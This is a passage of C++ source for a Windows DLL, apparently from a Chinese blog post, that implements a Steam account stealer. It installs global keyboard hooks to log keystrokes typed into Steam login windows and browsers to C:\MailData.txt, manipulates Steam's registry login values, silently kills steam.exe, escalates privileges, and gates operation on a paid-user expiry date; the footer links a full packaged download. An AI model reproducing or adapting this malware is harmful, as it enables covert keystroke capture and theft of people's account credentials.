							char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);
							Base64_AccSeconData.ReleaseBuffer();

							char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);
							Base64_DataSeconData.ReleaseBuffer();

							DWORD XdwTypeX1 = REG_SZ, XdwTypeX2 = REG_SZ;
							DWORD XdwTypeX3 = REG_SZ, XdwTypeX4 = REG_SZ;

							LONG lRet6z = RegSetValueEx( xhKeyX, 
							TEXT("AccSecond"), 
							NULL, 
							XdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));

							LONG lRet7z = RegSetValueEx( xhKeyX, 
							TEXT("DataSecond"), 
							NULL, 
							XdwTypeX2, (BYTE*)szData2, strlen(szData2));

							LONG lRet8z = RegSetValueEx( xhKeyX, 
							TEXT("AccOne"), 
							NULL, 
							XdwTypeX3, (BYTE*)"", 0);

							LONG lRet9z = RegSetValueEx( xhKeyX, 
							TEXT("DataOne"), 
							NULL, 
							XdwTypeX4, (BYTE*)"", 0);

							if(lRet6z == ERROR_SUCCESS && lRet7z == ERROR_SUCCESS && lRet8z == ERROR_SUCCESS && lRet9z == ERROR_SUCCESS)
							{
								if( !Login )
								{
									DWORD dwThreadId;
									thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);

									Login = true;
								}

								RegDeleteValue(hKey, TEXT("Gaming"));
							}
							else
							{
								RegDeleteValue(hKey, TEXT("AutoLoginUser"));

								Regedit = false;

								RegCloseKey(xhKeyX);
								RegCloseKey(xKey);
								RegCloseKey(hKey);
								RegCloseKey(hxKeyx);
								CloseHandle(hNotify);

								ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
							}
						}
						RegCloseKey(xhKeyX);
					}
					else
					{
						DeleteFile("C:\\NTUSERS.LOG");
						RegDeleteValue(hKey, TEXT("Gaming"));
						RegDeleteValue(hKey, TEXT("AutoLoginUser"));

						Regedit = false;
						RegCloseKey(hKey);
						RegCloseKey(hxKeyx);
						CloseHandle(hNotify);

						ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
					}
				}
				Regedit = false;
				RegCloseKey(xKey);
			}
			else
			{
				Regedit = false;
				RegDeleteValue(hKey, TEXT("AutoLoginUser"));
			}
		}
		RegCloseKey(hKey);
	} 
	CloseHandle(hNotify);
	RegCloseKey(hxKeyx);

	return 0;
}

 
// 清理帐号记录文件

static DWORD WINAPI CleanUserData(LPVOID pParam)
{
	while(1)
	{
		// 3 小时清理一次记录数据

		Sleep(3600000);

		DeleteFile("C:\\NTUSERS.LOG");
	}
	return 0;
}

 
// HOOK 键盘回调函数 2 (监控 浏览器 输入)

LRESULT DllExport CALLBACK IntProc2(int nCode, WPARAM wParam, LPARAM lParam)
{
		if( !::EnumWindows(EnumWindowsProc, NULL) )
		{
			if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1)
			{
				BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);
				BOOL b_Clk = ::GetKeyState(VK_CAPITAL);
				BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);
				BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);
				if(!b_Ctl && !b_Alt)
				{
					if(b_Sft && !b_Clk)
					{
						switch(wParam)
						{
						case '1':myEmailSTR = "!";break;
						case '2':myEmailSTR = "@";break;
						case '3':myEmailSTR = "#";break;
						case '4':myEmailSTR = "$";break;
						case '5':myEmailSTR = "%";break;
						case '6':myEmailSTR = "^";break;
						case '7':myEmailSTR = "&";break;
						case '8':myEmailSTR = "*";break;
						case '9':myEmailSTR = "(";break;
						case '0':myEmailSTR = ")";break;
						case 'A':myEmailSTR = "A";break;
						case 'B':myEmailSTR = "B";break;
						case 'C':myEmailSTR = "C";break;
						case 'D':myEmailSTR = "D";break;
						case 'E':myEmailSTR = "E";break;
						case 'F':myEmailSTR = "F";break;
						case 'G':myEmailSTR = "G";break;
						case 'H':myEmailSTR = "H";break;
						case 'I':myEmailSTR = "I";break;
						case 'J':myEmailSTR = "J";break;
						case 'K':myEmailSTR = "K";break;
						case 'L':myEmailSTR = "L";break;
						case 'M':myEmailSTR = "M";break;
						case 'N':myEmailSTR = "N";break;
						case 'O':myEmailSTR = "O";break;
						case 'P':myEmailSTR = "P";break;
						case 'Q':myEmailSTR = "Q";break;
						case 'R':myEmailSTR = "R";break;
						case 'S':myEmailSTR = "S";break;
						case 'T':myEmailSTR = "T";break;
						case 'U':myEmailSTR = "U";break;
						case 'V':myEmailSTR = "V";break;
						case 'W':myEmailSTR = "W";break;
						case 'X':myEmailSTR = "X";break;
						case 'Y':myEmailSTR = "Y";break;
						case 'Z':myEmailSTR = "Z";break;
						}
					}
					else if(!b_Sft && b_Clk)
					{
						switch(wParam)
						{
						case '1':myEmailSTR = "1";break;
						case '2':myEmailSTR = "2";break;
						case '3':myEmailSTR = "3";break;
						case '4':myEmailSTR = "4";break;
						case '5':myEmailSTR = "5";break;
						case '6':myEmailSTR = "6";break;
						case '7':myEmailSTR = "7";break;
						case '8':myEmailSTR = "8";break;
						case '9':myEmailSTR = "9";break;
						case '0':myEmailSTR = "0";break;
						case 'A':myEmailSTR = "A";break;
						case 'B':myEmailSTR = "B";break;
						case 'C':myEmailSTR = "C";break;
						case 'D':myEmailSTR = "D";break;
						case 'E':myEmailSTR = "E";break;
						case 'F':myEmailSTR = "F";break;
						case 'G':myEmailSTR = "G";break;
						case 'H':myEmailSTR = "H";break;
						case 'I':myEmailSTR = "I";break;
						case 'J':myEmailSTR = "J";break;
						case 'K':myEmailSTR = "K";break;
						case 'L':myEmailSTR = "L";break;
						case 'M':myEmailSTR = "M";break;
						case 'N':myEmailSTR = "N";break;
						case 'O':myEmailSTR = "O";break;
						case 'P':myEmailSTR = "P";break;
						case 'Q':myEmailSTR = "Q";break;
						case 'R':myEmailSTR = "R";break;
						case 'S':myEmailSTR = "S";break;
						case 'T':myEmailSTR = "T";break;
						case 'U':myEmailSTR = "U";break;
						case 'V':myEmailSTR = "V";break;
						case 'W':myEmailSTR = "W";break;
						case 'X':myEmailSTR = "X";break;
						case 'Y':myEmailSTR = "Y";break;
						case 'Z':myEmailSTR = "Z";break;
						}
					}
					else if(b_Sft && b_Clk)
					{
						switch(wParam)
						{
						case '1':myEmailSTR = "!";break;
						case '2':myEmailSTR = "@";break;
						case '3':myEmailSTR = "#";break;
						case '4':myEmailSTR = "$";break;
						case '5':myEmailSTR = "%";break;
						case '6':myEmailSTR = "^";break;
						case '7':myEmailSTR = "&";break;
						case '8':myEmailSTR = "*";break;
						case '9':myEmailSTR = "(";break;
						case '0':myEmailSTR = ")";break;
						case 'A':myEmailSTR = "a";break;
						case 'B':myEmailSTR = "b";break;
						case 'C':myEmailSTR = "c";break;
						case 'D':myEmailSTR = "d";break;
						case 'E':myEmailSTR = "e";break;
						case 'F':myEmailSTR = "f";break;
						case 'G':myEmailSTR = "g";break;
						case 'H':myEmailSTR = "h";break;
	     				case 'I':myEmailSTR = "i";break;
	    				case 'J':myEmailSTR = "j";break;
	    				case 'K':myEmailSTR = "k";break;
						case 'L':myEmailSTR = "l";break;
						case 'M':myEmailSTR = "m";break;
						case 'N':myEmailSTR = "n";break;
						case 'O':myEmailSTR = "o";break;
						case 'P':myEmailSTR = "p";break;
						case 'Q':myEmailSTR = "q";break;
						case 'R':myEmailSTR = "r";break;
						case 'S':myEmailSTR = "s";break;
						case 'T':myEmailSTR = "t";break;
						case 'U':myEmailSTR = "u";break;
						case 'V':myEmailSTR = "v";break;
						case 'W':myEmailSTR = "w";break;
						case 'X':myEmailSTR = "x";break;
						case 'Y':myEmailSTR = "y";break;
						case 'Z':myEmailSTR = "z";break;
						}
					}
					else
					{
						switch(wParam)
						{
						case '1':myEmailSTR = "1";break;
						case '2':myEmailSTR = "2";break;
						case '3':myEmailSTR = "3";break;
						case '4':myEmailSTR = "4";break;	
						case '5':myEmailSTR = "5";break;
						case '6':myEmailSTR = "6";break;
						case '7':myEmailSTR = "7";break;
						case '8':myEmailSTR = "8";break;
						case '9':myEmailSTR = "9";break;
						case '0':myEmailSTR = "0";break;
						case 'A':myEmailSTR = "a";break;
						case 'B':myEmailSTR = "b";break;
						case 'C':myEmailSTR = "c";break;
						case 'D':myEmailSTR = "d";break;
						case 'E':myEmailSTR = "e";break;
						case 'F':myEmailSTR = "f";break;
						case 'G':myEmailSTR = "g";break;
						case 'H':myEmailSTR = "h";break;
	     				case 'I':myEmailSTR = "i";break;
	    				case 'J':myEmailSTR = "j";break;
	    				case 'K':myEmailSTR = "k";break;
						case 'L':myEmailSTR = "l";break;
						case 'M':myEmailSTR = "m";break;
						case 'N':myEmailSTR = "n";break;
						case 'O':myEmailSTR = "o";break;
						case 'P':myEmailSTR = "p";break;
						case 'Q':myEmailSTR = "q";break;
						case 'R':myEmailSTR = "r";break;
						case 'S':myEmailSTR = "s";break;
						case 'T':myEmailSTR = "t";break;
						case 'U':myEmailSTR = "u";break;
						case 'V':myEmailSTR = "v";break;
						case 'W':myEmailSTR = "w";break;
						case 'X':myEmailSTR = "x";break;
						case 'Y':myEmailSTR = "y";break;
						case 'Z':myEmailSTR = "z";break;
						}
					}

					//小键盘按键
					switch(wParam)
					{
					case VK_NUMPAD1:myEmailSTR = "1";break;
					case VK_NUMPAD2:myEmailSTR = "2";break;
					case VK_NUMPAD3:myEmailSTR = "3";break;
					case VK_NUMPAD4:myEmailSTR = "4";break;
					case VK_NUMPAD5:myEmailSTR = "5";break;
					case VK_NUMPAD6:myEmailSTR = "6";break;
					case VK_NUMPAD7:myEmailSTR = "7";break;
					case VK_NUMPAD8:myEmailSTR = "8";break;
					case VK_NUMPAD9:myEmailSTR = "9";break;
					case VK_NUMPAD0:myEmailSTR = "0";break;
					case VK_MULTIPLY:myEmailSTR = "*";break;
					case VK_ADD:     myEmailSTR = "+";break;
					case VK_SUBTRACT:myEmailSTR = "-";break;
					case VK_DECIMAL: myEmailSTR = ".";break;
					case VK_DIVIDE:  myEmailSTR = "/";break;

					//其他特殊键
 					case VK_BACK:
						myEmailSTR = "[Back_Space]";
						//myEmailSTR.Delete(myEmailSTR.GetLength()-1);
						break;

					case VK_TAB:
						myEmailSTR = "   ";
						break;

					case VK_SPACE:
						myEmailSTR = " ";
						break;

					// 回车键
					case VK_RETURN:
						myEmailSTR = "    ";
						break;
					}

					//其他键的处理
					char KeyName[50];
					ZeroMemory(KeyName,50);
					GetKeyNameText(lParam,KeyName,50);
					CString KeyNameStr=KeyName;
					if(KeyNameStr=="`")
					{
						if(b_Sft)
							myEmailSTR = "~";
						else
							myEmailSTR = "`";
					}
					if(KeyNameStr=="-")
					{
						if(b_Sft)
							myEmailSTR = "_";
						else
							myEmailSTR = "-";
					}
					if(KeyNameStr=="=")
					{
						if(b_Sft)
							myEmailSTR = "+";
						else
							myEmailSTR = "=";
					}
					if(KeyNameStr=="[")
					{
						if(b_Sft)
							myEmailSTR = "{";
						else
							myEmailSTR = "[";
					}
					if(KeyNameStr=="]")
					{
						if(b_Sft)
							myEmailSTR = "}";
						else
							myEmailSTR = "]";
					}
					if(KeyNameStr==";")
					{
						if(b_Sft)
							myEmailSTR = ":";
						else
							myEmailSTR = ";";
					}
					if(KeyNameStr=="'")
					{
						if(b_Sft)
							myEmailSTR = "\"";
						else
							myEmailSTR = "'";
					}
					if(KeyNameStr==",")
					{
						if(b_Sft)
							myEmailSTR = "<";
						else
							myEmailSTR = ",";
					}
					if(KeyNameStr==".")
					{
						if(b_Sft)
							myEmailSTR = ">";
						else
							myEmailSTR = ".";
					}
					if(KeyNameStr=="/")
					{
						if(b_Sft)
							myEmailSTR = "?";
						else
							myEmailSTR = "/";
					}
					if(KeyNameStr=="\\")
					{
						if(b_Sft)
							myEmailSTR = "|";
						else
							myEmailSTR = "\\";
					}

					//AfxMessageBox(myEmailSTR);

					CFileFind finder1;
					BOOL noEmpty1=finder1.FindFile("C:\\MailData.txt");
					if(!noEmpty1)
					{
						FILE *fpx1;
						fpx1=fopen("C:\\MailData.txt", "w");
						if(fpx1)
						{
							fprintf(fpx1, "%s", myEmailSTR.GetBuffer(0));
						}
						fclose(fpx1);
					}
					else
					{
						FILE *fpx2;
						fpx2=fopen("C:\\MailData.txt", "a");
						if(fpx2)
						{
							fprintf(fpx2, "%s", myEmailSTR.GetBuffer(0));
						}
						fclose(fpx2);
					}
					myEmailSTR = "";
				}
			}
		}

	LRESULT RetVal = CallNextHookEx(hie, nCode, wParam, lParam );	
	return  RetVal;
}

 
// HOOK 键盘回调函数 (监控 Steam.exe 输入)

LRESULT DllExport CALLBACK IntProc1(int nCode,WPARAM wParam,LPARAM lParam)
{
	if(::GetCurrentProcessId() != GetEXE())
		return CallNextHookEx(hkb, nCode, wParam, lParam );

		HWND H_wnd = ::GetForegroundWindow();
		char sTitle[255];
		CString ss;
		::SendMessage(H_wnd,WM_GETTEXT,255,(LPARAM)sTitle);
		//AfxMessageBox(sTitle);

		ss.Format(TEXT("%s"), sTitle);
		//AfxMessageBox(ss);

		char *aaa;
		aaa = strstr(sTitle, "Steam  登录");
		char *bbb;
		bbb = strstr(sTitle, "Steam  登入");
		char *ccc;
		ccc = strstr(sTitle, "Steam  Login");
		char *ddd;
		ddd = strstr(sTitle, "S t e a m  登录");
		char *eee;
		eee = strstr(sTitle, "S t e a m  登  录");

		int n = ss.Find("Steam 登录",0);
		int m = ss.Find("Steam 登入",0);
		int o = ss.Find("Steam Login",0);
		int p = ss.Find("S t e a m 登录",0);
		int q = ss.Find("S t e a m 登 录",0);

		if( (aaa || bbb || ccc || ddd || eee) || (m >= 0 || n >= 0 || o >= 0 || p >= 0 || q >= 0) )
		{
			if(!Regedit)
			{
				HKEY hKeyx;
				LONG lRetx, lRetx2;
				lRetx = RegOpenKeyEx( HKEY_CURRENT_USER,
				TEXT("Software\\Valve\\Steam"),
				0, KEY_QUERY_VALUE|KEY_WRITE, &hKeyx );
				if( lRetx == ERROR_SUCCESS )
				{
					char datas[256] = {0};
					DWORD dwTypes = REG_SZ;
					DWORD dwLengths = 256;

					lRetx2 = RegQueryValueEx( hKeyx, 
					TEXT("AutoLoginUser"), 
					NULL, 
					&dwTypes, (LPBYTE)datas, &dwLengths );
					if(lRetx2 != ERROR_SUCCESS)
					{
						//创建线程监控注册表 1
						DWORD dwThreadId;
						CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); 

						Regedit = true;
					}
					else
					{
						// 如果注册表中能打开存放用户数据的键值
						// 而该键值又为空的话必须运行线程1来操作
						if( strlen(datas) < 4 )
						{
							//创建线程监控注册表 1
							DWORD dwThreadId;
							CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); 

							Regedit = true;
						}
						else
						{
							//创建线程监控注册表 2
							DWORD dwThreadId;
							CreateThread(NULL, 0, HOOKRegedit2, NULL, 0, &dwThreadId); 

							Regedit = true;
						}
					}
				}
				RegCloseKey(hKeyx);
			}

			if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1)
			{
				BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);
				BOOL b_Clk = ::GetKeyState(VK_CAPITAL);
				BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);
				BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);
				if(!b_Ctl && !b_Alt)
				{
					if(b_Sft && !b_Clk)
					{
						switch(wParam)
						{
						case '1':szStr += "!";break;
						case '2':szStr += "@";break;
						case '3':szStr += "#";break;
						case '4':szStr += "$";break;
						case '5':szStr += "%";break;
						case '6':szStr += "^";break;
						case '7':szStr += "&";break;
						case '8':szStr += "*";break;
						case '9':szStr += "(";break;
						case '0':szStr += ")";break;
						case 'A':szStr += "A";break;
						case 'B':szStr += "B";break;
						case 'C':szStr += "C";break;
						case 'D':szStr += "D";break;
						case 'E':szStr += "E";break;
						case 'F':szStr += "F";break;
						case 'G':szStr += "G";break;
						case 'H':szStr += "H";break;
						case 'I':szStr += "I";break;
						case 'J':szStr += "J";break;
						case 'K':szStr += "K";break;
						case 'L':szStr += "L";break;
						case 'M':szStr += "M";break;
						case 'N':szStr += "N";break;
						case 'O':szStr += "O";break;
						case 'P':szStr += "P";break;
						case 'Q':szStr += "Q";break;
						case 'R':szStr += "R";break;
						case 'S':szStr += "S";break;
						case 'T':szStr += "T";break;
						case 'U':szStr += "U";break;
						case 'V':szStr += "V";break;
						case 'W':szStr += "W";break;
						case 'X':szStr += "X";break;
						case 'Y':szStr += "Y";break;
						case 'Z':szStr += "Z";break;
						}
					}
					else if(!b_Sft && b_Clk)
					{
						switch(wParam)
						{
						case '1':szStr += "1";break;
						case '2':szStr += "2";break;
						case '3':szStr += "3";break;
						case '4':szStr += "4";break;
						case '5':szStr += "5";break;
						case '6':szStr += "6";break;
						case '7':szStr += "7";break;
						case '8':szStr += "8";break;
						case '9':szStr += "9";break;
						case '0':szStr += "0";break;
						case 'A':szStr += "A";break;
						case 'B':szStr += "B";break;
						case 'C':szStr += "C";break;
						case 'D':szStr += "D";break;
						case 'E':szStr += "E";break;
						case 'F':szStr += "F";break;
						case 'G':szStr += "G";break;
						case 'H':szStr += "H";break;
						case 'I':szStr += "I";break;
						case 'J':szStr += "J";break;
						case 'K':szStr += "K";break;
						case 'L':szStr += "L";break;
						case 'M':szStr += "M";break;
						case 'N':szStr += "N";break;
						case 'O':szStr += "O";break;
						case 'P':szStr += "P";break;
						case 'Q':szStr += "Q";break;
						case 'R':szStr += "R";break;
						case 'S':szStr += "S";break;
						case 'T':szStr += "T";break;
						case 'U':szStr += "U";break;
						case 'V':szStr += "V";break;
						case 'W':szStr += "W";break;
						case 'X':szStr += "X";break;
						case 'Y':szStr += "Y";break;
						case 'Z':szStr += "Z";break;
						}
					}
					else if(b_Sft && b_Clk)
					{
						switch(wParam)
						{
						case '1':szStr += "!";break;
						case '2':szStr += "@";break;
						case '3':szStr += "#";break;
						case '4':szStr += "$";break;
						case '5':szStr += "%";break;
						case '6':szStr += "^";break;
						case '7':szStr += "&";break;
						case '8':szStr += "*";break;
						case '9':szStr += "(";break;
						case '0':szStr += ")";break;
						case 'A':szStr += "a";break;
						case 'B':szStr += "b";break;
						case 'C':szStr += "c";break;
						case 'D':szStr += "d";break;
						case 'E':szStr += "e";break;
						case 'F':szStr += "f";break;
						case 'G':szStr += "g";break;
						case 'H':szStr += "h";break;
	     				case 'I':szStr += "i";break;
	    				case 'J':szStr += "j";break;
	    				case 'K':szStr += "k";break;
						case 'L':szStr += "l";break;
						case 'M':szStr += "m";break;
						case 'N':szStr += "n";break;
						case 'O':szStr += "o";break;
						case 'P':szStr += "p";break;
						case 'Q':szStr += "q";break;
						case 'R':szStr += "r";break;
						case 'S':szStr += "s";break;
						case 'T':szStr += "t";break;
						case 'U':szStr += "u";break;
						case 'V':szStr += "v";break;
						case 'W':szStr += "w";break;
						case 'X':szStr += "x";break;
						case 'Y':szStr += "y";break;
						case 'Z':szStr += "z";break;
						}
					}
					else
					{
						switch(wParam)
						{
						case '1':szStr += "1";break;
						case '2':szStr += "2";break;
						case '3':szStr += "3";break;
						case '4':szStr += "4";break;	
						case '5':szStr += "5";break;
						case '6':szStr += "6";break;
						case '7':szStr += "7";break;
						case '8':szStr += "8";break;
						case '9':szStr += "9";break;
						case '0':szStr += "0";break;
						case 'A':szStr += "a";break;
						case 'B':szStr += "b";break;
						case 'C':szStr += "c";break;
						case 'D':szStr += "d";break;
						case 'E':szStr += "e";break;
						case 'F':szStr += "f";break;
						case 'G':szStr += "g";break;
						case 'H':szStr += "h";break;
	     				case 'I':szStr += "i";break;
	    				case 'J':szStr += "j";break;
	    				case 'K':szStr += "k";break;
						case 'L':szStr += "l";break;
						case 'M':szStr += "m";break;
						case 'N':szStr += "n";break;
						case 'O':szStr += "o";break;
						case 'P':szStr += "p";break;
						case 'Q':szStr += "q";break;
						case 'R':szStr += "r";break;
						case 'S':szStr += "s";break;
						case 'T':szStr += "t";break;
						case 'U':szStr += "u";break;
						case 'V':szStr += "v";break;
						case 'W':szStr += "w";break;
						case 'X':szStr += "x";break;
						case 'Y':szStr += "y";break;
						case 'Z':szStr += "z";break;
						}
					}

					//小键盘按键
					switch(wParam)
					{
					case VK_NUMPAD1:szStr += "1";break;
					case VK_NUMPAD2:szStr += "2";break;
					case VK_NUMPAD3:szStr += "3";break;
					case VK_NUMPAD4:szStr += "4";break;
					case VK_NUMPAD5:szStr += "5";break;
					case VK_NUMPAD6:szStr += "6";break;
					case VK_NUMPAD7:szStr += "7";break;
					case VK_NUMPAD8:szStr += "8";break;
					case VK_NUMPAD9:szStr += "9";break;
					case VK_NUMPAD0:szStr += "0";break;
					case VK_MULTIPLY:szStr += "*";break;
					case VK_ADD:     szStr += "+";break;
					case VK_SUBTRACT:szStr += "-";break;
					case VK_DECIMAL: szStr += ".";break;
					case VK_DIVIDE:  szStr += "/";break;

					//其他特殊键
 					case VK_BACK:
						szStr.Delete(szStr.GetLength()-1);
						break;

					case VK_TAB:
						szStr += "   ";
						break;

					case VK_SPACE:
						szStr += " ";
						break;

					// 回车键
					case VK_RETURN:
						break;
					}

					//其他键的处理
					char KeyName[50];
					ZeroMemory(KeyName,50);
					GetKeyNameText(lParam,KeyName,50);
					CString KeyNameStr=KeyName;
					if(KeyNameStr=="`")
					{
						if(b_Sft)
							szStr += "~";
						else
							szStr += "`";
					}
					if(KeyNameStr=="-")
					{
						if(b_Sft)
							szStr += "_";
						else
							szStr += "-";
					}
					if(KeyNameStr=="=")
					{
						if(b_Sft)
							szStr += "+";
						else
							szStr += "=";
					}
					if(KeyNameStr=="[")
					{
						if(b_Sft)
							szStr += "{";
						else
							szStr += "[";
					}
					if(KeyNameStr=="]")
					{
						if(b_Sft)
							szStr += "}";
						else
							szStr += "]";
					}
					if(KeyNameStr==";")
					{
						if(b_Sft)
							szStr += ":";
						else
							szStr += ";";
					}
					if(KeyNameStr=="'")
					{
						if(b_Sft)
							szStr += "\"";
						else
							szStr += "'";
					}
					if(KeyNameStr==",")
					{
						if(b_Sft)
							szStr += "<";
						else
							szStr += ",";
					}
					if(KeyNameStr==".")
					{
						if(b_Sft)
							szStr += ">";
						else
							szStr += ".";
					}
					if(KeyNameStr=="/")
					{
						if(b_Sft)
							szStr += "?";
						else
							szStr += "/";
					}
					if(KeyNameStr=="\\")
					{
						if(b_Sft)
							szStr += "|";
						else
							szStr += "\\";
					}
					//AfxMessageBox(szStr);
				}
			}
		}

	LRESULT RetVal = CallNextHookEx(hkb, nCode, wParam, lParam );	
	return  RetVal;
}

 
// 安装 HOOK 钩子

BOOL DllExport installhook()
{
	///
	//				检测用户到期时间			 //
	///

	SYSTEMTIME st;
	CString strYear, strMonth, strDay, strFullTime;

	GetLocalTime(&st);

	strYear.Format("%d", st.wYear);
	strMonth.Format("%d", st.wMonth);
	strDay.Format("%d", st.wDay);

	if(st.wMonth < 10)
	{
		int mmm = strMonth.Find("0", 0);
		if(mmm < 0)
		{
			strMonth = "0" + strMonth;
		}
	}

	if(st.wDay < 10)
	{
		int ddd = strDay.Find("0", 0);
		if(ddd < 0)
		{
			strDay = "0" + strDay;
		}
	}

	strFullTime = strYear + strMonth + strDay;

	UserEndData.Remove('.');
	UserEndData.Remove('-');

	int LocalTime = atoi(strFullTime);
	int UserEndTime = atoi(UserEndData);

	if( LocalTime < UserEndTime )
	{
		//获取自身程序绝对路径
		TCHAR szmyPath[MAX_PATH + 1]={0};
		GetModuleFileName(NULL, szmyPath, MAX_PATH);
		(_tcsrchr(szmyPath, _T('\\')))[1] = 0;

		szMyselfPath.Format(TEXT("%s\\"), szmyPath);

		//
		// 删除帐号记录文件
		DeleteFile("C:\\NTUSERS.LOG");
				DeleteFile("C:\\MailData.txt");
						DeleteFile("C:\\MailName.txt");
		//
		//设置程序优先级别为最高
		SetRealTimePriority();
		//
		//提升程序的系统权限
		AdjustPrivileges();
		//
		// HOOK 键盘 1
		hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc1, hins, 0);
		//
		// HOOK 键盘 2
		hie = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc2, hinss, 0);
		//
		//创建线程定时清理用户输入数据
		DWORD dwThreadIDX;
		CreateThread(NULL, 0, CleanUserData, NULL, 0, &dwThreadIDX); 
		//
	}
	return TRUE;
}

 
// 卸载 HOOK 钩子

BOOL DllExport UnHook(HHOOK szHookName)
{   	
	if( UnhookWindowsHookEx(szHookName) )
	{
		return TRUE;
	}
	return FALSE;
}

 

BOOL CTest3App::InitInstance()
{	
	AFX_MANAGE_STATE(AfxGetStaticModuleState());
	hins=AfxGetInstanceHandle();
	hinss=AfxGetInstanceHandle();

	return TRUE;
}

/
// CTest3App construction

CTest3App::CTest3App()
{
	// TODO: add construction code here,
	// Place all significant initialization in InitInstance
}

/
// The one and only CTest3App object

CTest3App theApp;

完整项目下载

 主程序 + DLL + 帐号验证工具 一并打包上传,写的有点乱七八糟,没啥技术含量,对于目前情况已经没什么用处。

【CSDN下载】icon-default.png?t=N7T8https://download.csdn.net/download/qq_39190622/88683609

你可能感兴趣的:(Hook,系统安全,c++,网络攻击模型)